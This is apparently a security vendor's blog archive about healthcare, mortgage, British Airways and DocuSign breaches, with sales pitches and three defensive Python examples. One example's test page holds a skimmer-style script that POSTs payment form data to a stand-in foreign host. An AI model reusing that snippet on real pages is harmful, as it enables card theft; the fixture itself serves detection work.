Rush Joins List of Healthcare Providers with Significant Breach

A few weeks back we wrote about Easton Hospital and the lawsuit surrounding their 2014 loss of 4.5 million patients’ personal data.

On Monday it was reported that a breach of similar data had occurred at Rush University Medical Center. At an estimated 45,000 records the breach is roughly 100 times smaller than the one at Easton Hospital, and that is not the only dramatic difference between the two.

Chinese Hacking vs. Improper Disclosure

In the case of the Easton Hospital breach, forensics traced the intrusion to the malicious efforts of a Chinese hacking group. In the case of Rush, no “hacking” took place. Instead, according to an article on the Chicago Tribune website, “At Rush, an employee of one of the hospital system’s billing processing vendors improperly disclosed a file to ‘an unauthorized party,’ likely in May 2018, according to a letter sent to affected patients.”

Wall of Shame

The U.S. Department of Health and Human Services Office for Civil Rights breach portal, informally referred to as the “wall of shame”, reveals several interesting things about the state of data security in the healthcare industry.

  • Breaches on the Rise – Compared with the same period of 2018, 2019 is so far on a pace that is more than DOUBLE (24 vs. 59).
  • Averaging About 1 Medical Related Breach a Day – In the 65 days of 2019 that have passed so far, 59 data breaches have already been reported on the wall of shame.
  • Big Breach, Small Breach – The number of records disclosed ranges from as few as 576 (Managed Health Services) to as many as 400,000 (Columbia Surgical Specialist of Spokane).
  • Mainly Attributed to Hacking – 36 of the 59 breaches are attributed to Hacking/IT Incidents, with Unauthorized Disclosure (14) and Theft (9) accounting for the majority of the remainder.

Even the Best Security Can be Compromised

At Konsultek we develop world class security solutions that prevent, detect and respond to attempts to breach networks. However, as the Rush breach and the 13 other cases of Unauthorized Disclosure highlight, even world class security solutions can be undermined by the inadvertent or malicious actions of employees and sub-contractors. Ultimately, network access control has to be more than a digital solution. Training, procedures and other management controls must work in concert with IT’s security efforts in order to prevent human-powered security incidents.

Forescout® Sets a New Standard for Endpoint Visibility

According to Gartner, by 2023, the average CIO will be responsible for more than three times the endpoints they manage in 2018.
IT, Say Hello to OT
One of the primary drivers behind this endpoint increase will be the expansion in the number of IoT and OT endpoints. The role of IT is evolving, and IT departments, CIOs and CISOs are going to have to become more operationally focused in order to effectively manage security in the ever more connected world of business.
Forescout Leading the Way
“We see that the vast majority of this growth is coming from IoT and OT, as well as public and private cloud instances, over traditional IT and corporate managed devices,” said Michael DeCesare, CEO and president, Forescout. “With our latest platform release, Forescout is the only vendor that can offer true device visibility and control across the extended enterprise from IT to OT and scale to two million devices regardless of physical, virtual, cloud or hybrid environments.”
Introducing Forescout 8.1

Forescout 8.1 is the first unified device visibility and control platform for IT and OT networks. Finally, you can have complete situational awareness of all devices on your network and more effectively orchestrate actions to mitigate cyber and operational risk.

Konsultek Knows Forescout
As one of Forescout’s premier partners Konsultek has been helping customers across all industries gain visibility into their endpoints and more effectively control network access for years. So, whether you are looking for a self-managed implementation or a complete hands-off managed security service, Konsultek has the engineering expertise and direct access to Forescout’s top experts to make your endpoint security goals a reality.

Survey Reveals Size Matters When Planning Security Spend

In mid-August 2018 Gartner published its prediction of an 8.7% increase in IT security spending in 2019. A State of IT Security Survey released this week reveals that, when it comes to security spending in 2019, size matters.

Survey Says

Based on the survey, it will be the larger companies that primarily drive the 2019 increase in spend, while smaller organizations lag behind.

The vast majority of big spenders in the survey (69 percent) were mid-sized through very large organizations, and their spending lists are long.

By contrast, of the 46 percent of respondents who said their cybersecurity spending will remain flat or down slightly, 62 percent were from companies with fewer than 100 employees, and only a few were from very large companies.

Where Will the Spend be Focused?

According to the survey respondents, the majority of the spending will be on proven core security technologies, specifically NAC, web gateways and DLP. This is consistent with what we’re seeing at Konsultek and represents the bedrock of our expertise. Our holistic approach to security solutions is built upon weaving together offerings from leaders in each of these fields such as ForeScout, F5, Forcepoint and Checkpoint.

Are You Prepared?

About 64 percent of respondents said they conduct penetration testing at least annually, and 60 percent conduct threat hunting exercises at the same rate. Do you? Our team of engineers and account executives has the skills and resources to quickly and efficiently determine the vulnerability of your network and offer solutions for any weaknesses found.

If you are interested in getting an outside, independent and unbiased analysis of your network’s security, simply give us a call.

The first 20 respondents will receive a complimentary Executive Risk Assessment. This assessment will not only show you the risk and impact to your most critical digital assets but demonstrate the likelihood of a breach happening.

Easton PA Hospital Getting Close to Settling Breach Lawsuit

Easton, PA is a small town in Pennsylvania’s beautiful Lehigh Valley with a population of just under 30,000. It is probably best known as the home of America’s beloved Crayola crayons.

Image Source: Google Maps

Targeted by Chinese Hackers

It wasn’t Crayola however that Chinese hackers were interested in back in August, 2014 when they executed a cyberattack on another Easton landmark, it was the local hospital. At the time, Easton Hospital was owned by CHS (Community Health Systems) of Franklin, TN. According to Easton Hospital and CHS thieves stole the personal data of some 4.5 million patients including names, birthdates, phone numbers and Social Security numbers.

Lawsuit Pending Approval

Today, nearly 5 years later, a host of lawsuits has been consolidated into one larger suit whose settlement now awaits approval by a judge in Atlanta. If the judge approves it this August, qualifying victims would be eligible for two types of payments:

  1. Up to $250 for out-of-pocket expenses and documented time lost from the breach.
  2. Up to $5,000 for losses due to identity fraud or identity theft from the cyberattack.

Joining an Ever Growing List

A running tally of notable data breach settlements is maintained online, and based upon its scope the Easton breach could potentially be added to it. Here is the list:

  • Anthem: $115 million
  • Target: $28.5 million ($18.5M for states, $10M for consumers)
  • Home Depot (affected 50 million cardholders): $19.5 million settlement
  • Sony (PlayStation network breach): $15 million
  • Ashley Madison: $12.8 million ($11.6M for consumers, $1.2M for states and the FTC)
  • Sony (employee information breach): $8 million
  • Stanford University Hospital and Clinics: $4.1 million
  • AvMed Inc.: $3.1 million
  • Vendini: $3 million
  • Schnuck Markets: $2.1 million

A Wakeup Call for All Healthcare Providers

This settlement should serve as a wakeup call for all healthcare providers. If only a quarter of the 4.5 million patients received just the $250 payout, the cost to the affected parties would be over $281 million!

Healthcare providers by nature have access to the most sensitive personal data on the planet. You know that, I know that and the cybercriminal element knows that. Because of this we foresee a continued targeting of healthcare providers going forward. From simple information stealing to more elaborate ransomware attacks, healthcare providers need to make certain that their network security is as robust as possible.

How Konsultek Can Help

At Konsultek we eat, sleep and breathe security.

Our team of engineers and account executives has the skills and resources to quickly and efficiently determine the vulnerability of your network and offer solutions for any weaknesses found.

If you are interested in getting an outside, independent and unbiased analysis of your network’s security, simply give us a call.

The first 20 respondents will receive a complimentary Executive Risk Assessment. This assessment will not only show you the risk and impact to your most critical digital assets but demonstrate the likelihood of a breach happening.


Mortgage and Loan Data Leaked Twice

Seven days ago TechCrunch revealed that independent security researcher Bob Diachenko had found 24 million financial and banking documents exposed to the world by a server that had been left reachable without authentication. Considering the type of data exposed (loan documents and sensitive financial and tax documents) this was a significant and very serious breach.

“These documents contained highly sensitive data, such as Social Security numbers, names, phones, addresses, credit history and other details which are usually part of a mortgage or credit report,” Diachenko told TechCrunch. “This information would be a gold mine for cyber criminals who would have everything they need to steal identities, file false tax returns, get loans or credit cards.”

The leaked documents were OCR (Optical Character Recognition) files and while the compromised server was immediately shut down once the security flaw was identified there is no telling how many cybercriminals might have already accessed the files.

Who’s at Fault?

After working through the various parties involved, it appears that the source of the breach was the machine learning firm OpticsML, which according to its website (now offline) “will automate the page indexing and data extraction process entirely. Different from traditional OCR companies, Optics Machine Learning trains computers to read and understand documents like a human, enabling an 80% reduction in labor needs alongside higher levels of accuracy so your analysts can focus on higher level tasks.”

Same Documents Released AGAIN!

In a surprising “you can’t make this stuff up” twist on this already monumental breach, the following day Diachenko found the original loan documents at an “easy to guess” web address in an Amazon S3 storage bucket, without so much as simple password protection. Since Amazon S3 buckets are private by default, someone either accidentally or deliberately set the permissions to public.
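As an added example (not code from the original post or from any party to the incident), here is how to spot the misconfiguration described above before a researcher does: an offline check of a bucket’s policy and ACL documents for grants that expose object reads to everyone on the internet. The bucket name, account ID, role name and policy documents below are constructed for illustration.

```python
"""Flag S3 bucket policies and ACLs that grant object reads to the whole internet.

Added example, not code from the original post or from any party in the
incident. It evaluates policy and ACL documents you have already retrieved
(for instance with `aws s3api get-bucket-policy` / `get-bucket-acl`), so it runs
offline; the sample documents below are constructed for illustration.
"""

ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTH_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
READ_PERMISSIONS = {"READ", "FULL_CONTROL"}
# Actions (lower-cased) that let a caller fetch object contents.
READ_ACTIONS = {"s3:getobject", "s3:get*", "s3:*", "*"}


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principal_is_everyone(principal):
    """Principal "*" or {"AWS": "*"} means any caller, signed-in or anonymous."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def public_read_statements(policy_doc):
    """Return Sids (or positions) of Allow statements exposing object reads to everyone.

    Statements carrying a Condition (aws:SourceIp, aws:SourceVpce, ...) narrow
    the wildcard principal and are left for manual review rather than flagged.
    """
    found = []
    for idx, stmt in enumerate(policy_doc.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if not _principal_is_everyone(stmt.get("Principal")):
            continue
        actions = {a.lower() for a in _as_list(stmt.get("Action"))}
        if not actions & READ_ACTIONS:
            continue
        if stmt.get("Condition"):
            continue
        found.append(stmt.get("Sid") or f"Statement[{idx}]")
    return found


def public_read_grants(acl_doc):
    """Return the global groups (AllUsers / AuthenticatedUsers) the ACL lets read."""
    exposed = []
    for grant in acl_doc.get("Grants", []):
        grantee = grant.get("Grantee", {})
        uri = grantee.get("URI", "")
        if (grantee.get("Type") == "Group" and uri in (ALL_USERS, AUTH_USERS)
                and grant.get("Permission") in READ_PERMISSIONS):
            exposed.append(uri.rsplit("/", 1)[-1])
    return exposed


def bucket_is_public(policy_doc, acl_doc):
    """Combined verdict: either mechanism alone is enough to leak every object."""
    return bool(public_read_statements(policy_doc) or public_read_grants(acl_doc))


# --- constructed sample documents (shapes follow the AWS API responses) ---
LEAKY_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicReadGetObject",
        "Effect": "Allow",
        "Principal": "*",
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::example-loan-docs/*",
    }],
}
PRIVATE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PipelineOnly",
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::123456789012:role/ocr-pipeline"},
        "Action": ["s3:GetObject", "s3:PutObject"],
        "Resource": "arn:aws:s3:::example-loan-docs/*",
    }],
}
LEAKY_ACL = {
    "Owner": {"ID": "owner-canonical-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
    ],
}
PRIVATE_ACL = {
    "Owner": {"ID": "owner-canonical-id"},
    "Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"}, "Permission": "FULL_CONTROL"},
    ],
}

if __name__ == "__main__":
    print("policy findings:", public_read_statements(LEAKY_POLICY))
    print("acl findings:", public_read_grants(LEAKY_ACL))
    print("private bucket public?", bucket_is_public(PRIVATE_POLICY, PRIVATE_ACL))
```

Run it against the JSON returned by `aws s3api get-bucket-policy` and `aws s3api get-bucket-acl` for each bucket. Both mechanisms are checked because a bucket with a clean policy can still be wide open through a single AllUsers ACL grant; the durable fix is to enable S3 Block Public Access at the account level so that neither can be flipped to public by one permissions change.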

While this may not end up being the largest data breach of 2019, with more than 11 months left in the year it surely has secured its place in the top 10 most significant breaches by virtue of the fact that the same information was exposed twice in two different formats on completely different storage networks.

Security On Your Mind?

At Konsultek we eat, sleep and breathe security. Our team of engineers and account executives has the skills and resources to quickly and efficiently determine the vulnerability of your network and offer solutions for any weaknesses found. If you are interested in getting an outside, independent and unbiased analysis of your network’s security, simply give us a call. The first 20 respondents will receive a complimentary Executive Risk Assessment, which will not only show you the risk and impact to your most critical digital assets but demonstrate the likelihood of a breach happening.

2018 HIMSS Cybersecurity Survey Findings

The 2018 HIMSS Cybersecurity Survey has been released and it’s a “must read” for anyone in the healthcare security space.

Most Respondents Have Had a Significant Security Incident

An overwhelming 75% of survey respondents indicated that their organization had experienced a significant security incident in the past 12 months. Unfortunately the 2017 survey did not include this question, so there is no way to tell whether this represents an increase or a decrease over 2017.

Image Source: 2018 HIMSS Cybersecurity Survey

Phishing and Negligence are Top Threat Actors

37.6% of respondents identified “online scam artists”, such as those behind phishing and spear phishing campaigns, as the #1 threat actor in 2018. Next in line? “Negligent insiders” at 20.8%. Negligent insiders are defined as well-meaning but careless individuals with trusted access who may inadvertently facilitate a breach.

E-mail Dominates as the Initial Point of Compromise

While this is no surprise given the #1 position of “online scam artists” cited above, the attribution of phishing emails as the starting point for 61.9% of all significant security events was higher than expected. This strongly suggests that in addition to robust network security detection and containment solutions healthcare providers should also be investing to create a culture of security through employee training.

More Resources Being Allocated to Cybersecurity

If there is a bright spot in the survey it is certainly that healthcare organizations as a whole (83.4%) are allocating more resources to cybersecurity. This is good news since 2018 saw cybercriminals increasing their focus on healthcare and other high profile industries that have deep pockets and a low threshold of pain.

The Cure for Your Cyber Security Pain

Konsultek knows healthcare security. Organizations both small and large trust their network security to our customized solutions and holistic approach. If you are experiencing the symptoms of a cybersecurity illness it may be time to schedule an appointment with one of our specialists.  From executive assessments to penetration testing we have the knowhow and experience to identify and cure what ails you.

Navy Responds to Cyber Breaches with Research Solicitation

Back in December we covered the Navy’s alarming revelation that significant cyber breaches had occurred over the prior 18 months.


Corrective Actions Already Underway

Last week NAVAIR updated their Resilient Cyber Warfare Capabilities for NAVAIR Weapon Systems solicitation. This solicitation, originally issued July 6, 2018 seeks research support technologies that are applicable to making the NAVAIR Weapon Systems more resilient to cyber-attack. It’s good to know that NAVAIR has already been making efforts to take corrective actions after the October 2018 GAO Study found that some of the most sophisticated weapons systems were vulnerable to relatively simplistic attacks.

3 Pillars of Interest

According to published reporting, NAVAIR is planning to better protect its systems moving forward by improving its capabilities in 3 areas.

  1. Dynamic Reconfiguration – when a network makes “changes to router rules, access control lists, intrusion detection/prevention system parameters, and filter rules for firewalls and gateways.” – as defined by NIST.
  2. Deception Tactics – “Leveraging classical denial and deception techniques to understand the specifics of adversary attacks enables an organization to build an active, threat-based cyber defense,” – according to researchers at MITRE.
  3. Artificial Intelligence – “We see that the more we automate our networks and the more we use machines to do the heavy lifting, the better. Our brains do not have the intellectual capacity to process all of that information,” – Rear Adm. Danelle Barrett, Navy Cyber Security Division Director.
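The first pillar is the one most easily shown in code. The following added example (not NAVAIR, NIST or MITRE code) takes IDS alert lines and turns a burst of alerts from one source into a firewall block that expires on its own. Everything below is an assumption for illustration rather than something the article states: alert lines in the style of Suricata’s fast.log, an nftables set named blocklist created with the timeout flag, the documentation-range addresses, and a management allowlist that the automation is never allowed to block.

```python
"""Dynamic reconfiguration: turn bursts of IDS alerts into firewall blocks that expire.

Added example; not NAVAIR, NIST or MITRE code. Assumed, not from the article:
alert lines in the style of Suricata's fast.log, an nftables set `inet filter
blocklist` created with `flags timeout`, and a management allowlist that the
automation must never touch.
"""
import ipaddress
import re
import subprocess
from collections import defaultdict
from datetime import datetime, timedelta

ALERT_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d/\d{4}-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+\[[^\]]+\]\s+"
    r"(?P<msg>.*?)\s+\[\*\*\].*?\[Priority:\s*(?P<prio>\d+)\]\s+\{\w+\}\s+"
    r"(?P<src>[\d.]+):\d+\s+->\s+(?P<dst>[\d.]+):\d+\s*$"
)
# Hypothetical management and loopback ranges; blocking these is self-inflicted denial of service.
NEVER_BLOCK = [ipaddress.ip_network(n) for n in ("10.0.0.0/24", "127.0.0.0/8")]


def parse_alert(line):
    """Return (timestamp, source_ip, priority, message) or None for non-alert lines."""
    m = ALERT_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%m/%d/%Y-%H:%M:%S.%f")
    return ts, m.group("src"), int(m.group("prio")), m.group("msg")


def is_protected(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in NEVER_BLOCK)


def block_command(ip, ttl):
    """argv for nft; the element carries its own timeout so the block undoes itself."""
    return ["nft", "add", "element", "inet", "filter", "blocklist", f"{{ {ip} timeout {ttl} }}"]


def plan_blocks(lines, threshold=3, window=timedelta(minutes=5), max_priority=2, ttl="1h"):
    """Map source IP -> nft argv for every source with at least `threshold` alerts of
    priority <= max_priority inside any `window`; protected ranges are never planned."""
    hits = defaultdict(list)
    for line in lines:
        parsed = parse_alert(line)
        if parsed is None:
            continue
        ts, src, prio, _ = parsed
        if prio <= max_priority and not is_protected(src):
            hits[src].append(ts)
    plan = {}
    for src, stamps in hits.items():
        stamps.sort()
        for i in range(threshold - 1, len(stamps)):
            # Sliding window: the i-th alert and the one `threshold` back are close together.
            if stamps[i] - stamps[i - threshold + 1] <= window:
                plan[src] = block_command(src, ttl)
                break
    return plan


def apply_plan(plan, dry_run=True):
    """Run the nft commands (or, in dry-run, just return them as display strings)."""
    if not dry_run:
        for argv in plan.values():
            subprocess.run(argv, check=True)
    return [" ".join(argv) for argv in plan.values()]


# Constructed alert lines in fast.log style; local rule SIDs and documentation addresses.
SAMPLE_ALERTS = [
    "02/18/2019-10:15:01.000001  [**] [1:1000001:1] LOCAL SSH auth failure burst [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 2] {TCP} 203.0.113.5:44821 -> 192.0.2.12:22",
    "02/18/2019-10:15:40.000002  [**] [1:1000001:1] LOCAL SSH auth failure burst [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 2] {TCP} 203.0.113.5:44822 -> 192.0.2.12:22",
    "02/18/2019-10:16:30.000003  [**] [1:1000001:1] LOCAL SSH auth failure burst [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 2] {TCP} 203.0.113.5:44823 -> 192.0.2.12:22",
    "02/18/2019-10:15:10.000004  [**] [1:1000002:1] LOCAL Single port probe [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 198.51.100.7:5120 -> 192.0.2.12:445",
    "02/18/2019-10:40:00.000005  [**] [1:1000002:1] LOCAL Single port probe [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 198.51.100.7:5121 -> 192.0.2.12:445",
    "02/18/2019-10:55:00.000006  [**] [1:1000002:1] LOCAL Single port probe [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 198.51.100.7:5122 -> 192.0.2.12:445",
    "02/18/2019-10:17:00.000007  [**] [1:1000001:1] LOCAL SSH auth failure burst [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 2] {TCP} 10.0.0.3:50000 -> 192.0.2.12:22",
    "02/18/2019-10:17:01.000008  [**] [1:1000001:1] LOCAL SSH auth failure burst [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 2] {TCP} 10.0.0.3:50001 -> 192.0.2.12:22",
    "02/18/2019-10:17:02.000009  [**] [1:1000001:1] LOCAL SSH auth failure burst [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 2] {TCP} 10.0.0.3:50002 -> 192.0.2.12:22",
    "02/18/2019-10:17:03.000010  [**] [1:1000003:1] LOCAL Informational banner grab [**] [Classification: Not Suspicious Traffic] [Priority: 3] {TCP} 203.0.113.9:6000 -> 192.0.2.12:80",
    "this line is not an alert and must be ignored",
]

if __name__ == "__main__":
    for cmd in apply_plan(plan_blocks(SAMPLE_ALERTS)):
        print(cmd)
```

Only 203.0.113.5 ends up blocked: 198.51.100.7 has three alerts but spread over 40 minutes, 10.0.0.3 sits in the protected range, and 203.0.113.9 only triggered a priority-3 rule. The allowlist and the TTL are the two parts practitioners get bitten by: without the first, a spoofed or misattributed alert lets an attacker make the defence lock out its own administrators; without the second, the block set grows forever and nobody remembers why an address is in it.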

Mirrors Konsultek’s Approach

What does protecting NAVAIR weapons systems and protecting your network have in common? In both cases a dynamic, holistic approach to security is needed. At Konsultek our custom security solutions defend, detect and secure networks against attacks from all manner of threat vectors. When you’re ready to take the next step in advanced network protection, give us a call to learn more.

Is Automation the Key to Lower Incident Response Times?

This year’s SANS Endpoint Security Survey report is loaded with interesting statistics such as:

  • 42% of IT professionals acknowledged they had suffered a breach on their endpoints.
  • 20% said they did not know if they had been breached.
  • 82% of those that knew of a breach said it had involved a desktop.
  • 69% cited corporate laptops.
  • 42% cited employee-owned laptops.
  • 47% of antivirus capabilities detected threats.
  • 26% of breaches were detected by endpoint detection and response (EDR) capabilities.

It was this last response that was of particular interest, so we took a deeper dive.

Endpoints Up Response Times Down

One of the challenges facing security professionals is the seemingly ever expanding number of endpoints that need to be monitored. It’s akin to having an ever expanding fence line that needs to be patrolled and maintained by a rancher to prevent loss of livestock to predators.


Interestingly enough, despite the growth in endpoints, this year’s report showed that incident response times are actually decreasing. One of the primary reasons for this is automated endpoint detection and response (EDR) capabilities.

Are you Automated?


If you have purchased and fully implemented a next-gen EDR solution you can consider yourself and your organization firmly ahead of the curve. As SANS analyst and survey author Lee Neely states in the report:


“The diversity and quantity of endpoints in the modern enterprise are driving the need for more automation and predictive capabilities. While [organizations] are purchasing solutions to keep ahead of the emerging cyber threats, they appear to fall short on implementing the key purchased capabilities needed to protect and monitor the endpoint.”

In fact, to be more specific:

“Of the IT professionals that had acquired next-gen endpoint security solutions, 37% haven’t implemented their full capabilities”.

Let Konsultek Help You Automate

The SANS Incident Response Survey shows that the largest number of respondents had a “time to detect” of 6 to 24 hours, a “time to contain” of 2 to 7 days and a “time to remediate” of 2 to 7 days. As security professionals looking to secure an ever more complex endpoint “fence line”, how do we accelerate incident response? The obvious answer is machine-based automation.

Curious as to how that might work in your organization’s network? We’d be happy to explain! Just give us a call to discuss how a Konsultek custom security solution can take your organization to a whole new level of security.


22-Line Code “Scalpel” Removes British Airways Customer Data

A couple of weeks ago British Airways confirmed that the personal data of 380,000 customers had been stolen.

Magecart Again. Still?

On September 11th the simplicity of this surgical strike was revealed by RiskIQ, and the details are pretty amazing. According to RiskIQ the incident, which lasted 15 days, was very similar to the breach of Ticketmaster UK earlier in the year. That similarity, combined with crawl data, allowed them to quickly confirm that the threat actors were one and the same: Magecart.

Magecart is a group of criminals that specialize in web based credit card skimmers. RiskIQ actively monitors 2 billion pages of the world wide web for Magecart activity and Magecart is so active that RiskIQ gets hourly notifications of sites being hacked!

The 22 Line Scalpel

In the case of the British Airways hack, Magecart slightly modified their code so it went unnoticed by RiskIQ’s automated crawlers, and only after the fact could RiskIQ manually identify their handiwork. It turned out that 22 lines of JavaScript, reproduced in RiskIQ’s report, are what excised the personal data of 380,000 customers.

The same code also appears to have affected the British Airways mobile app for the same period of time. This is because the app was developed as an empty shell that simply pulled in functionality from the desktop site. While past Magecart attacks grabbed form data indiscriminately, these 22 lines were highly targeted, extracting payment information and sending it off to their own servers.
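The attack worked because a script the page did not ship with ran on the payment page and posted form data to a host that was not British Airways. As an added example (not RiskIQ’s crawler and not British Airways’ code), the following audits a checkout page’s scripts against an allowlist of approved origins and a baseline of known inline scripts, and flags any inline script that talks to a foreign host. The page HTML, the .invalid hostnames, the allowlist and the baseline are constructed for illustration.

```python
"""Audit a checkout page's scripts against an allowlist and a known-good baseline.

Added example; not RiskIQ's crawler and not British Airways' code. The HTML,
the .invalid hostnames, the allowlist and the baseline are constructed.
"""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")


class _ScriptCollector(HTMLParser):
    """Record every <script>: external src, integrity attribute, inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._attrs = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._attrs = dict(attrs)
            self._buf = []

    def handle_data(self, data):
        if self._attrs is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._attrs is not None:
            self.scripts.append({"src": self._attrs.get("src"),
                                 "integrity": self._attrs.get("integrity"),
                                 "body": "".join(self._buf).strip()})
            self._attrs = None


def origin_of(url):
    p = urlparse(url)
    return f"{p.scheme}://{p.netloc}".lower()


def inline_hash(body):
    return hashlib.sha256(body.strip().encode("utf-8")).hexdigest()


def audit_scripts(html, page_url, allowed_origins, baseline_hashes):
    """Return (severity, detail) findings. Anything not first-party, not allowlisted
    and not in the inline baseline is reported; inline code posting to a foreign
    host is the skimmer signature and is rated critical."""
    collector = _ScriptCollector()
    collector.feed(html)
    first_party = origin_of(page_url)
    findings = []
    for s in collector.scripts:
        if s["src"]:
            src = urljoin(page_url, s["src"])
            origin = origin_of(src)
            if origin == first_party:
                continue
            if origin not in allowed_origins:
                findings.append(("high", f"unexpected third-party script {src}"))
            elif not s["integrity"]:
                findings.append(("medium", f"third-party script without SRI {src}"))
            continue
        digest = inline_hash(s["body"])
        if digest not in baseline_hashes:
            findings.append(("high", f"inline script not in baseline ({digest[:12]})"))
        for url in URL_RE.findall(s["body"]):
            o = origin_of(url)
            if o != first_party and o not in allowed_origins:
                findings.append(("critical", f"inline script sends to foreign host {urlparse(url).netloc}"))
    return findings


# --- constructed sample page: one approved CDN script with SRI, one without,
# one baseline inline script and one injected skimmer-style script ---
PAGE_URL = "https://shop.example.com/checkout"
ALLOWED_ORIGINS = {"https://cdn.example-cdn.invalid"}
KNOWN_INLINE = "document.getElementById('pay').disabled = false;"
BASELINE = {inline_hash(KNOWN_INLINE)}
SAMPLE_HTML = (
    '<html><body><form id="payment"><input name="card"><button id="pay">Pay</button></form>\n'
    '<script src="/js/checkout.js"></script>\n'
    '<script src="https://cdn.example-cdn.invalid/lib.js" integrity="sha384-AAAA" crossorigin="anonymous"></script>\n'
    '<script src="https://cdn.example-cdn.invalid/analytics.js"></script>\n'
    "<script>" + KNOWN_INLINE + "</script>\n"
    "<script>\n"
    "document.getElementById('pay').addEventListener('mouseup', function () {\n"
    "  var data = JSON.stringify(serializeForm('payment'));\n"
    "  fetch('https://checkout-cdn.invalid/gateway', {method: 'POST', body: data});\n"
    "});\n"
    "</script></body></html>"
)

if __name__ == "__main__":
    for severity, detail in audit_scripts(SAMPLE_HTML, PAGE_URL, ALLOWED_ORIGINS, BASELINE):
        print(f"[{severity}] {detail}")
```

Feed it the HTML your own crawler fetches from the live checkout page on a schedule; a new finding is the signal to diff against what was actually deployed. Because the mobile app pulled the same page from the desktop site, one monitored URL would have covered both channels.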

Konsultek Knows Security

Threat prevention, detection and quarantine are the hallmarks of a robust security solution. If your current approach to network security is a patchwork quilt of boxes and software that has been cobbled together over time it’s probably time to have us perform a comprehensive review. Simply give us a call and we’ll schedule a time to chat. It’s really that easy to get started.

While WannaCry is Making Headlines Docusign Breach Quietly Endangers Users

Rather than write the 1000th post about WannaCry (although our Partners at Proofpoint, their Engineer Darien Huss and a fellow called MalwareTech deserve a serious shout-out from the world for stopping WannaCry) I decided to cover something with potentially huge financial implications that has virtually gone under the radar by comparison.

While WannaCry was grabbing the cybersecurity headlines for the week, it turns out that online signature giant DocuSign was more quietly and in a rather methodical fashion, publicly disclosing the details of a significant and serious cyberbreach themselves.

Here’s an abbreviated timeline of what we know so far from DocuSign themselves.

Update 5/9/2017 – Malicious Email Campaign

DocuSign is tracking a malicious email campaign where the subject reads: “Completed: – Wire Transfer Instructions for recipient-name Document Ready for Signature”.

The email contains a link to a downloadable Word Document which is designed to trick the recipient into running what’s known as macro-enabled-malware.

Update 5/15/2017 – Malicious Email Campaign

DocuSign is tracking a malicious email campaign where the subject reads: “Completed *company name* – Accounting Invoice *number* Document Ready for Signature”. The email contains a link to a downloadable Word Document which is designed to trick the recipient into running what’s known as macro-enabled-malware.

These emails are not associated with DocuSign. They originate from a malicious third-party using DocuSign branding in the headers and body of the email. The emails are sent from non-DocuSign-related domains including Legitimate DocuSign signing emails come from or email addresses.

Update 5/15/2017 – Latest update on malicious email campaign

Last week and again this morning, DocuSign detected an increase in phishing emails sent to some of our customers and users – and we posted alerts here on the DocuSign Trust Site and in social media. The emails “spoofed” the DocuSign brand in an attempt to trick recipients into opening an attached Word document that, when clicked, installs malicious software. As part of our process in response to phishing incidents, we confirmed that DocuSign’s core eSignature service, envelopes and customer documents remain secure.

However, as part of our ongoing investigation, today we confirmed that a malicious third party had gained temporary access to a separate, non-core communication system used for service-related announcements that contained a list of email addresses. A complete forensic analysis has confirmed that only email addresses were accessed; no names, physical addresses, passwords, social security numbers, credit card data or other information was accessed. No content or any customer documents sent through DocuSign’s eSignature system was accessed; and DocuSign’s core eSignature service, envelopes and customer documents and data remain secure.

Update 5/16/2017 @ 8:55 Pacific Time – Key Update on Malicious Campaign

Q: Have the email addresses of my employees, customers or customers’ customers been exposed as part of this incident?
A: As part of our ongoing investigation, we can now confirm that no signers were on the list of email addresses that was accessed maliciously unless they had signed up for a DocuSign account. That could include direct DocuSign customers; someone who signed a document and elected to open a DocuSign account; or someone who signed up for a DocuSign freemium account – via, through a partner integration, or via the DocuSign mobile client.

Update 5/17/2017 @ 1:02 PM Pacific Time – New Phishing Campaign Discovered Today

DocuSign has observed a new phishing campaign that began the morning of May 16 (Pacific Time). The email comes from “” with the subject “Legal acknowledgement for <person> Document is Ready for Signature” and it contains a link to a malicious, macro-enabled Word document. We suggest you do not open this email, but rather delete it immediately.

The Ultimate Phishing Scam?

This may very well be the ultimate spear phishing campaign. While the number of email addresses compromised has not been disclosed, we can assume it is A LOT, and a considerable portion of those affected routinely use DocuSign multiple times a month, if not weekly or daily. Since DocuSign emails are both expected and “trusted” we can only further assume that these phishing campaigns are being effective. There is no official report on just how effective so far, but perhaps we’ll get an update as further details emerge.

It seems likely that this scam will continue for a very long time given that DocuSign reportedly has 100 million users.
